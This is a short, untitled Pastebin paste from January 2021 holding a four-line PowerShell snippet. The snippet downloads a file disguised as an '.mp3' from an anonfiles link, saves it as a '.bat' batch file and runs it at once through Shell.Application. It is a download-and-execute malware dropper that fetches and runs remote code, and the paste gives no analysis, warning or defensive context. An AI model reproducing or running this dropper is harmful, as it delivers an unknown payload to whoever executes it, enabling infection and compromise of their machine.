KATARSIS0414

Untitled

Jan 24th, 2021
68
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.23 KB | None | 0 0
  1. $url_file = 'https://cdn-122.anonfiles.com/R3L9m1C8p0/9a395baa-1611475417/2.mp3'
  2. $file = '2.bat'
  3. PowerShell (New-Object System.net.WebClient).DownloadFile($url_file,$file),
  4. (New-Object -com Shell.Application).ShellExecute($file);
Add Comment
Please, Sign In to add comment